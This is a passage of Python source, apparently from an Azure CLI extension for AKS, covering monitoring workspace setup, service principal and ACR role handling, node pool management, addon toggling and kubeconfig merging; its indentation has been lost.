ResourceGroup = cmd.get_models('ResourceGroup', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
resource_group = ResourceGroup(location=workspace_region)
resource_groups.create_or_update(default_workspace_resource_group, resource_group)
GenericResource = cmd.get_models('GenericResource', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
generic_resource = GenericResource(location=workspace_region, properties={'sku': {'name': 'standalone'}})
async_poller = resources.begin_create_or_update_by_id(default_workspace_resource_id, '2015-11-01-preview',
generic_resource)
ws_resource_id = ''
while True:
result = async_poller.result(15)
if async_poller.done():
ws_resource_id = result.id
break
return ws_resource_id
def _sanitize_loganalytics_ws_resource_id(workspace_resource_id):
workspace_resource_id = workspace_resource_id.strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
return workspace_resource_id
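# _ensure_container_insights_for_monitoring deploys the ContainerInsights solution into the
# workspace referenced by the monitoring addon config, via an ARM deployment in the workspace's
# resource group; it is a no-op when the addon is disabled.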
def _ensure_container_insights_for_monitoring(cmd, addon):
if not addon.enabled:
return None
# workaround for this addon key which has been seen lowercased in the wild
for key in list(addon.config):
if key.lower() == CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID.lower() and key != CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID:
addon.config[CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID] = addon.config.pop(
key)
workspace_resource_id = addon.config[CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID].strip(
)
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
# extract subscription ID and resource group from workspace_resource_id URL
try:
subscription_id = workspace_resource_id.split('/')[2]
resource_group = workspace_resource_id.split('/')[4]
except IndexError:
raise CLIError(
'Could not locate resource group in workspace-resource-id URL.')
# region of workspace can be different from region of RG so find the location of the workspace_resource_id
resources = cf_resources(cmd.cli_ctx, subscription_id)
from azure.core.exceptions import HttpResponseError
try:
resource = resources.get_by_id(
workspace_resource_id, '2015-11-01-preview')
location = resource.location
except HttpResponseError as ex:
raise ex
unix_time_in_millis = int(
(datetime.datetime.utcnow() - datetime.datetime.utcfromtimestamp(0)).total_seconds() * 1000.0)
solution_deployment_name = 'ContainerInsights-{}'.format(
unix_time_in_millis)
# pylint: disable=line-too-long
template = {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"parameters": {
"workspaceResourceId": {
"type": "string",
"metadata": {
"description": "Azure Monitor Log Analytics Resource ID"
}
},
"workspaceRegion": {
"type": "string",
"metadata": {
"description": "Azure Monitor Log Analytics workspace region"
}
},
"solutionDeploymentName": {
"type": "string",
"metadata": {
"description": "Name of the solution deployment"
}
}
},
"resources": [
{
"type": "Microsoft.Resources/deployments",
"name": "[parameters('solutionDeploymentName')]",
"apiVersion": "2017-05-10",
"subscriptionId": "[split(parameters('workspaceResourceId'),'/')[2]]",
"resourceGroup": "[split(parameters('workspaceResourceId'),'/')[4]]",
"properties": {
"mode": "Incremental",
"template": {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"parameters": {},
"variables": {},
"resources": [
{
"apiVersion": "2015-11-01-preview",
"type": "Microsoft.OperationsManagement/solutions",
"location": "[parameters('workspaceRegion')]",
"name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]",
"properties": {
"workspaceResourceId": "[parameters('workspaceResourceId')]"
},
"plan": {
"name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]",
"product": "[Concat('OMSGallery/', 'ContainerInsights')]",
"promotionCode": "",
"publisher": "Microsoft"
}
}
]
},
"parameters": {}
}
}
]
}
params = {
"workspaceResourceId": {
"value": workspace_resource_id
},
"workspaceRegion": {
"value": location
},
"solutionDeploymentName": {
"value": solution_deployment_name
}
}
deployment_name = 'aks-monitoring-{}'.format(unix_time_in_millis)
# publish the Container Insights solution to the Log Analytics workspace
return _invoke_deployment(cmd, resource_group, deployment_name, template, params,
validate=False, no_wait=False, subscription_id=subscription_id)
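# Service principal handling: if --service-principal is not supplied, a cached principal is loaded
# from aksServicePrincipal.json when available; otherwise a new SP with a generated client secret
# is created and cached for later runs.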
def _ensure_aks_service_principal(cli_ctx,
service_principal=None,
client_secret=None,
subscription_id=None,
dns_name_prefix=None,
fqdn_subdomain=None,
location=None,
name=None):
file_name_aks = 'aksServicePrincipal.json'
# TODO: This really needs to be unit tested.
rbac_client = get_graph_rbac_management_client(cli_ctx)
if not service_principal:
# --service-principal not specified, try to load it from local disk
principal_obj = load_acs_service_principal(
subscription_id, file_name=file_name_aks)
if principal_obj:
service_principal = principal_obj.get('service_principal')
client_secret = principal_obj.get('client_secret')
else:
# Nothing to load, make one.
if not client_secret:
client_secret = _create_client_secret()
salt = binascii.b2a_hex(os.urandom(3)).decode('utf-8')
if dns_name_prefix:
url = 'http://{}.{}.{}.cloudapp.azure.com'.format(
salt, dns_name_prefix, location)
else:
url = 'http://{}.{}.{}.cloudapp.azure.com'.format(
salt, fqdn_subdomain, location)
service_principal = _build_service_principal(
rbac_client, cli_ctx, name, url, client_secret)
if not service_principal:
raise CLIError('Could not create a service principal with the right permissions. '
'Are you an Owner on this project?')
logger.info('Created a service principal: %s', service_principal)
# We don't need to add role assignment for this created SPN
else:
# --service-principal specified, validate that --client-secret was too
if not client_secret:
raise CLIError(
'--client-secret is required if --service-principal is specified')
store_acs_service_principal(
subscription_id, client_secret, service_principal, file_name=file_name_aks)
return load_acs_service_principal(subscription_id, file_name=file_name_aks)
def _get_rg_location(ctx, resource_group_name, subscription_id=None):
groups = cf_resource_groups(ctx, subscription_id=subscription_id)
# Do the get to fetch the location; it will error out if the group doesn't exist.
rg = groups.get(resource_group_name)
return rg.location
def _check_cluster_autoscaler_flag(enable_cluster_autoscaler,
min_count,
max_count,
node_count,
agent_pool_profile):
if enable_cluster_autoscaler:
if min_count is None or max_count is None:
raise CLIError(
'Please specify both min-count and max-count when --enable-cluster-autoscaler enabled')
if int(min_count) > int(max_count):
raise CLIError(
'value of min-count should be less than or equal to value of max-count')
if int(node_count) < int(min_count) or int(node_count) > int(max_count):
raise CLIError(
'node-count is not in the range of min-count and max-count')
agent_pool_profile.min_count = int(min_count)
agent_pool_profile.max_count = int(max_count)
agent_pool_profile.enable_auto_scaling = True
else:
if min_count is not None or max_count is not None:
raise CLIError(
'min-count and max-count are only valid when --enable-cluster-autoscaler is specified')
def _create_client_secret():
# Add a special character to satisfy AAD SP secret requirements
special_char = '$'
client_secret = binascii.b2a_hex(
os.urandom(10)).decode('utf-8') + special_char
return client_secret
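# ACR attach/detach: the ACR can be referenced either by full resource ID or by name (looked up
# across all resource groups); the 'acrpull' role assignment on the registry is then created or
# deleted for the given client id.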
def _ensure_aks_acr(cli_ctx,
client_id,
acr_name_or_id,
subscription_id, # pylint: disable=unused-argument
detach=False):
from msrestazure.tools import is_valid_resource_id, parse_resource_id
# Check if the ACR exists by resource ID.
if is_valid_resource_id(acr_name_or_id):
try:
parsed_registry = parse_resource_id(acr_name_or_id)
acr_client = cf_container_registry_service(
cli_ctx, subscription_id=parsed_registry['subscription'])
registry = acr_client.registries.get(
parsed_registry['resource_group'], parsed_registry['name'])
except CloudError as ex:
raise CLIError(ex.message)
_ensure_aks_acr_role_assignment(
cli_ctx, client_id, registry.id, detach)
return
# Check if the ACR exists by name across all resource groups.
registry_name = acr_name_or_id
registry_resource = 'Microsoft.ContainerRegistry/registries'
try:
registry = get_resource_by_name(
cli_ctx, registry_name, registry_resource)
except CloudError as ex:
if 'was not found' in ex.message:
raise CLIError(
"ACR {} not found. Have you provided the right ACR name?".format(registry_name))
raise CLIError(ex.message)
_ensure_aks_acr_role_assignment(cli_ctx, client_id, registry.id, detach)
return
def _ensure_aks_acr_role_assignment(cli_ctx,
client_id,
registry_id,
detach=False):
if detach:
if not _delete_role_assignments(cli_ctx,
'acrpull',
client_id,
scope=registry_id):
raise CLIError('Could not delete role assignments for ACR. '
'Are you an Owner on this subscription?')
return
if not _add_role_assignment(cli_ctx,
'acrpull',
client_id,
scope=registry_id):
raise CLIError('Could not create a role assignment for ACR. '
'Are you an Owner on this subscription?')
return
def _add_virtual_node_role_assignment(cmd, result, vnet_subnet_id):
# Remove trailing "/subnets/<SUBNET_NAME>" to get the vnet id
vnet_id = vnet_subnet_id.rpartition('/')[0]
vnet_id = vnet_id.rpartition('/')[0]
service_principal_msi_id = None
is_service_principal = False
os_type = 'Linux'
addon_name = CONST_VIRTUAL_NODE_ADDON_NAME + os_type
# Check if service principal exists, if it does, assign permissions to service principal
# Else, provide permissions to MSI
if (
hasattr(result, 'service_principal_profile') and
hasattr(result.service_principal_profile, 'client_id') and
result.service_principal_profile.client_id.lower() != 'msi'
):
logger.info('valid service principal exists, using it')
service_principal_msi_id = result.service_principal_profile.client_id
is_service_principal = True
elif (
(hasattr(result, 'addon_profiles')) and
(addon_name in result.addon_profiles) and
(hasattr(result.addon_profiles[addon_name], 'identity')) and
(hasattr(result.addon_profiles[addon_name].identity, 'object_id'))
):
logger.info('virtual node MSI exists, using it')
service_principal_msi_id = result.addon_profiles[addon_name].identity.object_id
is_service_principal = False
if service_principal_msi_id is not None:
if not _add_role_assignment(cmd.cli_ctx, 'Contributor',
service_principal_msi_id, is_service_principal, scope=vnet_id):
logger.warning('Could not create a role assignment for virtual node addon. '
'Are you an Owner on this subscription?')
else:
logger.warning('Could not find a service principal or user assigned MSI for role '
'assignment')
def aks_agentpool_show(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
return instance
def aks_agentpool_list(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name):
return client.list(resource_group_name, cluster_name)
def aks_agentpool_add(cmd, # pylint: disable=unused-argument,too-many-locals
client,
resource_group_name,
cluster_name,
nodepool_name,
tags=None,
kubernetes_version=None,
node_zones=None,
enable_node_public_ip=False,
node_public_ip_prefix_id=None,
node_vm_size=None,
node_osdisk_type=None,
node_osdisk_size=0,
node_count=3,
vnet_subnet_id=None,
pod_subnet_id=None,
ppg=None,
max_pods=0,
os_type="Linux",
os_sku=None,
enable_fips_image=False,
min_count=None,
max_count=None,
enable_cluster_autoscaler=False,
node_taints=None,
priority=CONST_SCALE_SET_PRIORITY_REGULAR,
eviction_policy=CONST_SPOT_EVICTION_POLICY_DELETE,
spot_max_price=float('nan'),
labels=None,
max_surge=None,
mode="User",
aks_custom_headers=None,
kubelet_config=None,
linux_os_config=None,
enable_encryption_at_host=False,
no_wait=False):
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name == nodepool_name:
raise CLIError("Node pool {} already exists, please try a different name, "
"use 'aks nodepool list' to get the current list of node pools".format(nodepool_name))
upgradeSettings = AgentPoolUpgradeSettings()
taints_array = []
if node_taints is not None:
for taint in node_taints.split(','):
try:
taint = taint.strip()
taints_array.append(taint)
except ValueError:
raise CLIError(
'Taint does not match allowed values. Expect value such as "special=true:NoSchedule".')
if node_vm_size is None:
if os_type == "Windows":
node_vm_size = "Standard_D2s_v3"
else:
node_vm_size = "Standard_DS2_v2"
if max_surge:
upgradeSettings.max_surge = max_surge
agent_pool = AgentPool(
name=nodepool_name,
tags=tags,
node_labels=labels,
count=int(node_count),
vm_size=node_vm_size,
os_type=os_type,
os_sku=os_sku,
enable_fips=enable_fips_image,
storage_profile=ContainerServiceStorageProfileTypes.managed_disks,
vnet_subnet_id=vnet_subnet_id,
pod_subnet_id=pod_subnet_id,
proximity_placement_group_id=ppg,
agent_pool_type="VirtualMachineScaleSets",
max_pods=int(max_pods) if max_pods else None,
orchestrator_version=kubernetes_version,
availability_zones=node_zones,
enable_node_public_ip=enable_node_public_ip,
node_public_ip_prefix_id=node_public_ip_prefix_id,
node_taints=taints_array,
scale_set_priority=priority,
upgrade_settings=upgradeSettings,
enable_encryption_at_host=enable_encryption_at_host,
mode=mode
)
if priority == CONST_SCALE_SET_PRIORITY_SPOT:
agent_pool.scale_set_eviction_policy = eviction_policy
if isnan(spot_max_price):
spot_max_price = -1
agent_pool.spot_max_price = spot_max_price
_check_cluster_autoscaler_flag(
enable_cluster_autoscaler, min_count, max_count, node_count, agent_pool)
if node_osdisk_size:
agent_pool.os_disk_size_gb = int(node_osdisk_size)
if node_osdisk_type:
agent_pool.os_disk_type = node_osdisk_type
if kubelet_config:
agent_pool.kubelet_config = _get_kubelet_config(kubelet_config)
if linux_os_config:
agent_pool.linux_os_config = _get_linux_os_config(linux_os_config)
headers = get_aks_custom_headers(aks_custom_headers)
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, agent_pool, custom_headers=headers)
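# Note on the defaults above: when --node-vm-size is omitted, Windows pools default to
# Standard_D2s_v3 and Linux pools to Standard_DS2_v2. For spot pools the eviction policy is applied
# and an unset spot max price is stored as -1, which conventionally means the price is only capped
# at the on-demand price.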
def aks_agentpool_scale(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
node_count=3,
no_wait=False):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
new_node_count = int(node_count)
if instance.enable_auto_scaling:
raise CLIError("Cannot scale cluster autoscaler enabled node pool.")
if new_node_count == instance.count:
raise CLIError(
"The new node count is the same as the current node count.")
instance.count = new_node_count # pylint: disable=no-member
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_upgrade(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
kubernetes_version='',
no_wait=False,
node_image_only=False,
max_surge=None):
if kubernetes_version != '' and node_image_only:
raise CLIError('Conflicting flags. Upgrading the Kubernetes version will also upgrade the node image version. '
'If you only want to upgrade the node image version, please use the "--node-image-only" option.')
if node_image_only:
return _upgrade_single_nodepool_image_version(no_wait,
client,
resource_group_name,
cluster_name,
nodepool_name)
instance = client.get(resource_group_name, cluster_name, nodepool_name)
instance.orchestrator_version = kubernetes_version
if not instance.upgrade_settings:
instance.upgrade_settings = AgentPoolUpgradeSettings()
if max_surge:
instance.upgrade_settings.max_surge = max_surge
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_get_upgrade_profile(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name):
return client.get_upgrade_profile(resource_group_name, cluster_name, nodepool_name)
def aks_agentpool_update(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
tags=None,
enable_cluster_autoscaler=False,
disable_cluster_autoscaler=False,
update_cluster_autoscaler=False,
min_count=None, max_count=None,
max_surge=None,
mode=None,
no_wait=False):
update_autoscaler = enable_cluster_autoscaler + \
disable_cluster_autoscaler + update_cluster_autoscaler
if (update_autoscaler != 1 and not tags and not mode and not max_surge):
raise CLIError('Please specify one or more of "--enable-cluster-autoscaler" or '
'"--disable-cluster-autoscaler" or '
'"--update-cluster-autoscaler" or '
'"--tags" or "--mode" or "--max-surge"')
instance = client.get(resource_group_name, cluster_name, nodepool_name)
if min_count is None or max_count is None:
if enable_cluster_autoscaler or update_cluster_autoscaler:
raise CLIError('Please specify both min-count and max-count when --enable-cluster-autoscaler or '
'--update-cluster-autoscaler is set.')
if min_count is not None and max_count is not None:
if int(min_count) > int(max_count):
raise CLIError(
'value of min-count should be less than or equal to value of max-count.')
if enable_cluster_autoscaler:
if instance.enable_auto_scaling:
logger.warning('Autoscaler is already enabled for this node pool.\n'
'Please run "az aks nodepool update --update-cluster-autoscaler" '
'if you want to update min-count or max-count.')
return None
instance.min_count = int(min_count)
instance.max_count = int(max_count)
instance.enable_auto_scaling = True
if update_cluster_autoscaler:
if not instance.enable_auto_scaling:
raise CLIError('Autoscaler is not enabled for this node pool.\n'
'Run "az aks nodepool update --enable-cluster-autoscaler" '
'to enable the cluster autoscaler with min-count and max-count.')
instance.min_count = int(min_count)
instance.max_count = int(max_count)
if not instance.upgrade_settings:
instance.upgrade_settings = AgentPoolUpgradeSettings()
if max_surge:
instance.upgrade_settings.max_surge = max_surge
if disable_cluster_autoscaler:
if not instance.enable_auto_scaling:
logger.warning(
'Autoscaler is already disabled for this node pool.')
return None
instance.enable_auto_scaling = False
instance.min_count = None
instance.max_count = None
instance.tags = tags
if mode is not None:
instance.mode = mode
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_delete(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
no_wait=False):
agentpool_exists = False
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name.lower() == nodepool_name.lower():
agentpool_exists = True
break
if not agentpool_exists:
raise CLIError("Node pool {} doesn't exist, "
"use 'aks nodepool list' to get current node pool list".format(nodepool_name))
return sdk_no_wait(no_wait, client.delete, resource_group_name, cluster_name, nodepool_name)
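# Addon enable/disable flow: both commands fetch the managed cluster, let _update_addons rewrite
# instance.addon_profiles, and then PUT the cluster back; enabling monitoring, ingress-appgw or
# virtual-node additionally waits for the operation so the required role assignments can be added.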
def aks_disable_addons(cmd, client, resource_group_name, name, addons, no_wait=False):
instance = client.get(resource_group_name, name)
subscription_id = get_subscription_id(cmd.cli_ctx)
instance = _update_addons(
cmd,
instance,
subscription_id,
resource_group_name,
name,
addons,
enable=False,
no_wait=no_wait
)
# send the managed cluster representation to update the addon profiles
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
def aks_enable_addons(cmd, client, resource_group_name, name, addons, workspace_resource_id=None,
subnet_name=None, appgw_name=None, appgw_subnet_prefix=None, appgw_subnet_cidr=None, appgw_id=None, appgw_subnet_id=None,
appgw_watch_namespace=None, enable_sgxquotehelper=False, enable_secret_rotation=False, no_wait=False):
instance = client.get(resource_group_name, name)
subscription_id = get_subscription_id(cmd.cli_ctx)
instance = _update_addons(cmd, instance, subscription_id, resource_group_name, name, addons, enable=True,
workspace_resource_id=workspace_resource_id, subnet_name=subnet_name,
appgw_name=appgw_name, appgw_subnet_prefix=appgw_subnet_prefix, appgw_subnet_cidr=appgw_subnet_cidr, appgw_id=appgw_id, appgw_subnet_id=appgw_subnet_id, appgw_watch_namespace=appgw_watch_namespace,
enable_sgxquotehelper=enable_sgxquotehelper, enable_secret_rotation=enable_secret_rotation, no_wait=no_wait)
if CONST_MONITORING_ADDON_NAME in instance.addon_profiles and instance.addon_profiles[CONST_MONITORING_ADDON_NAME].enabled:
_ensure_container_insights_for_monitoring(
cmd, instance.addon_profiles[CONST_MONITORING_ADDON_NAME])
monitoring = CONST_MONITORING_ADDON_NAME in instance.addon_profiles and instance.addon_profiles[
CONST_MONITORING_ADDON_NAME].enabled
ingress_appgw_addon_enabled = CONST_INGRESS_APPGW_ADDON_NAME in instance.addon_profiles and instance.addon_profiles[
CONST_INGRESS_APPGW_ADDON_NAME].enabled
os_type = 'Linux'
enable_virtual_node = False
if CONST_VIRTUAL_NODE_ADDON_NAME + os_type in instance.addon_profiles:
enable_virtual_node = True
need_post_creation_role_assignment = monitoring or ingress_appgw_addon_enabled or enable_virtual_node
if need_post_creation_role_assignment:
# adding a wait here since we rely on the result for role assignment
result = LongRunningOperation(cmd.cli_ctx)(
client.create_or_update(resource_group_name, name, instance))
cloud_name = cmd.cli_ctx.cloud.name
# mdm metrics are supported only in Azure Public cloud, so add the role assignment only in this cloud
if monitoring and cloud_name.lower() == 'azurecloud':
from msrestazure.tools import resource_id
cluster_resource_id = resource_id(
subscription=subscription_id,
resource_group=resource_group_name,
namespace='Microsoft.ContainerService', type='managedClusters',
name=name
)
_add_monitoring_role_assignment(result, cluster_resource_id, cmd)
if ingress_appgw_addon_enabled:
_add_ingress_appgw_addon_role_assignment(result, cmd)
if enable_virtual_node:
# All agent pools reside in the same vnet, and we grant the vnet-level Contributor role
# in a later function, so using any agent pool here is OK
random_agent_pool = result.agent_pool_profiles[0]
if random_agent_pool.vnet_subnet_id != "":
_add_virtual_node_role_assignment(
cmd, result, random_agent_pool.vnet_subnet_id)
# Otherwise, the cluster is not using a custom VNet; the permission is already granted in the AKS RP,
# so we don't need to handle it on the client side in this case.
else:
result = sdk_no_wait(no_wait, client.create_or_update,
resource_group_name, name, instance)
return result
def aks_rotate_certs(cmd, client, resource_group_name, name, no_wait=True): # pylint: disable=unused-argument
return sdk_no_wait(no_wait, client.rotate_cluster_certificates, resource_group_name, name)
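# _update_addons validates each requested addon against the ADDONS map, normalizes addon profile
# key casing, and refuses to re-enable most addons that are already enabled (the user must disable
# them first to change their configuration).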
def _update_addons(cmd, # pylint: disable=too-many-branches,too-many-statements
instance,
subscription_id,
resource_group_name,
name,
addons,
enable,
workspace_resource_id=None,
subnet_name=None,
appgw_name=None,
appgw_subnet_prefix=None,
appgw_subnet_cidr=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None,
enable_sgxquotehelper=False,
enable_secret_rotation=False,
no_wait=False): # pylint: disable=unused-argument
# parse the comma-separated addons argument
addon_args = addons.split(',')
addon_profiles = instance.addon_profiles or {}
os_type = 'Linux'
# for each addon argument
for addon_arg in addon_args:
if addon_arg not in ADDONS:
raise CLIError("Invalid addon name: {}.".format(addon_arg))
addon = ADDONS[addon_arg]
if addon == CONST_VIRTUAL_NODE_ADDON_NAME:
# only linux is supported for now, in the future this will be a user flag
addon += os_type
# honor addon names defined in Azure CLI
for key in list(addon_profiles):
if key.lower() == addon.lower() and key != addon:
addon_profiles[addon] = addon_profiles.pop(key)
if enable:
# add new addons or update existing ones and enable them
addon_profile = addon_profiles.get(
addon, ManagedClusterAddonProfile(enabled=False))
# special config handling for certain addons
if addon in [CONST_MONITORING_ADDON_NAME, CONST_AZURE_DEFENDER_ADDON_NAME]:
logAnalyticsConstName = CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID if addon == CONST_MONITORING_ADDON_NAME else CONST_AZURE_DEFENDER_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID
if addon_profile.enabled:
raise CLIError(f'The {addon} addon is already enabled for this managed cluster.\n'
f'To change {addon} configuration, run "az aks disable-addons -a {addon}" '
'before enabling it again.')
if not workspace_resource_id:
workspace_resource_id = _ensure_default_log_analytics_workspace_for_monitoring(
cmd,
subscription_id,
resource_group_name)
workspace_resource_id = _sanitize_loganalytics_ws_resource_id(workspace_resource_id)
addon_profile.config = {
logAnalyticsConstName: workspace_resource_id}
elif addon == (CONST_VIRTUAL_NODE_ADDON_NAME + os_type):
if addon_profile.enabled:
raise CLIError('The virtual-node addon is already enabled for this managed cluster.\n'
'To change virtual-node configuration, run '
'"az aks disable-addons -a virtual-node -g {resource_group_name}" '
'before enabling it again.')
if not subnet_name:
raise CLIError(
'The aci-connector addon requires setting a subnet name.')
addon_profile.config = {
CONST_VIRTUAL_NODE_SUBNET_NAME: subnet_name}
elif addon == CONST_INGRESS_APPGW_ADDON_NAME:
if addon_profile.enabled:
raise CLIError('The ingress-appgw addon is already enabled for this managed cluster.\n'
'To change ingress-appgw configuration, run '
f'"az aks disable-addons -a ingress-appgw -n {name} -g {resource_group_name}" '
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={})
if appgw_name is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME] = appgw_name
if appgw_subnet_prefix is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_prefix
if appgw_subnet_cidr is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_cidr
if appgw_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID] = appgw_id
if appgw_subnet_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_ID] = appgw_subnet_id
if appgw_watch_namespace is not None:
addon_profile.config[CONST_INGRESS_APPGW_WATCH_NAMESPACE] = appgw_watch_namespace
elif addon == CONST_OPEN_SERVICE_MESH_ADDON_NAME:
if addon_profile.enabled:
raise CLIError('The open-service-mesh addon is already enabled for this managed cluster.\n'
'To change open-service-mesh configuration, run '
f'"az aks disable-addons -a open-service-mesh -n {name} -g {resource_group_name}" '
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={})
elif addon == CONST_CONFCOM_ADDON_NAME:
if addon_profile.enabled:
raise CLIError('The confcom addon is already enabled for this managed cluster.\n'
'To change confcom configuration, run '
f'"az aks disable-addons -a confcom -n {name} -g {resource_group_name}" '
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={CONST_ACC_SGX_QUOTE_HELPER_ENABLED: "false"})
if enable_sgxquotehelper:
addon_profile.config[CONST_ACC_SGX_QUOTE_HELPER_ENABLED] = "true"
elif addon == CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME:
if addon_profile.enabled:
raise CLIError('The azure-keyvault-secrets-provider addon is already enabled for this managed cluster.\n'
'To change azure-keyvault-secrets-provider configuration, run '
f'"az aks disable-addons -a azure-keyvault-secrets-provider -n {name} -g {resource_group_name}" '
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={CONST_SECRET_ROTATION_ENABLED: "false"})
if enable_secret_rotation:
addon_profile.config[CONST_SECRET_ROTATION_ENABLED] = "true"
addon_profiles[CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME] = addon_profile
addon_profiles[addon] = addon_profile
else:
if addon not in addon_profiles:
if addon == CONST_KUBE_DASHBOARD_ADDON_NAME:
addon_profiles[addon] = ManagedClusterAddonProfile(
enabled=False)
else:
raise CLIError(
"The addon {} is not installed.".format(addon))
addon_profiles[addon].config = None
addon_profiles[addon].enabled = enable
instance.addon_profiles = addon_profiles
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return instance
def aks_get_versions(cmd, client, location): # pylint: disable=unused-argument
return client.list_orchestrators(location, resource_type='managedClusters')
def aks_get_os_options(cmd, client, location): # pylint: disable=unused-argument
return client.get_os_options(location, resource_type='managedClusters')
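# Kubeconfig handling: credentials are either printed to stdout (path "-") or merged into the
# target kubeconfig; name clashes prompt for overwrite, admin contexts get a "-admin" suffix, and
# loose file permissions on the existing config are reported with a warning.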
def _print_or_merge_credentials(path, kubeconfig, overwrite_existing, context_name):
"""Merge an unencrypted kubeconfig into the file at the specified path, or print it to
stdout if the path is "-".
"""
# Special case for printing to stdout
if path == "-":
print(kubeconfig)
return
# ensure that at least an empty ~/.kube/config exists
directory = os.path.dirname(path)
if directory and not os.path.exists(directory):
try:
os.makedirs(directory)
except OSError as ex:
if ex.errno != errno.EEXIST:
raise
if not os.path.exists(path):
with os.fdopen(os.open(path, os.O_CREAT | os.O_WRONLY, 0o600), 'wt'):
pass
# merge the new kubeconfig into the existing one
fd, temp_path = tempfile.mkstemp()
additional_file = os.fdopen(fd, 'w+t')
try:
additional_file.write(kubeconfig)
additional_file.flush()
merge_kubernetes_configurations(
path, temp_path, overwrite_existing, context_name)
except yaml.YAMLError as ex:
logger.warning(
'Failed to merge credentials to kube config file: %s', ex)
finally:
additional_file.close()
os.remove(temp_path)
def _handle_merge(existing, addition, key, replace):
if not addition[key]:
return
if existing[key] is None:
existing[key] = addition[key]
return
for i in addition[key]:
for j in existing[key]:
if i['name'] == j['name']:
if replace or i == j:
existing[key].remove(j)
else:
from knack.prompting import prompt_y_n
msg = 'A different object named {} already exists in your kubeconfig file.\nOverwrite?'
overwrite = False
try:
overwrite = prompt_y_n(msg.format(i['name']))
except NoTTYException:
pass
if overwrite:
existing[key].remove(j)
else:
msg = 'A different object named {} already exists in {} in your kubeconfig file.'
raise CLIError(msg.format(i['name'], key))
existing[key].append(i)
def load_kubernetes_configuration(filename):
try:
with open(filename) as stream:
return yaml.safe_load(stream)
except (IOError, OSError) as ex:
if getattr(ex, 'errno', 0) == errno.ENOENT:
raise CLIError('{} does not exist'.format(filename))
except (yaml.parser.ParserError, UnicodeDecodeError) as ex:
raise CLIError('Error parsing {} ({})'.format(filename, str(ex)))
def merge_kubernetes_configurations(existing_file, addition_file, replace, context_name=None):
existing = load_kubernetes_configuration(existing_file)
addition = load_kubernetes_configuration(addition_file)
if context_name is not None:
addition['contexts'][0]['name'] = context_name
addition['contexts'][0]['context']['cluster'] = context_name
addition['clusters'][0]['name'] = context_name
addition['current-context'] = context_name
# rename the admin context so it doesn't overwrite the user context
for ctx in addition.get('contexts', []):
try:
if ctx['context']['user'].startswith('clusterAdmin'):
admin_name = ctx['name'] + '-admin'
addition['current-context'] = ctx['name'] = admin_name
break
except (KeyError, TypeError):
continue
if addition is None:
raise CLIError(
'failed to load additional configuration from {}'.format(addition_file))
if existing is None:
existing = addition
else:
_handle_merge(existing, addition, 'clusters', replace)
_handle_merge(existing, addition, 'users', replace)
_handle_merge(existing, addition, 'contexts', replace)
existing['current-context'] = addition['current-context']
# check that ~/.kube/config is only read- and writable by its owner
if platform.system() != 'Windows':
existing_file_perms = "{:o}".format(
stat.S_IMODE(os.lstat(existing_file).st_mode))
if not existing_file_perms.endswith('600'):
logger.warning('%s has permissions "%s".\nIt should be readable and writable only by its owner.',
existing_file, existing_file_perms)
with open(existing_file, 'w+') as stream:
yaml.safe_dump(existing, stream, default_flow_style=False)
current_context = addition.get('current-context', 'UNKNOWN')
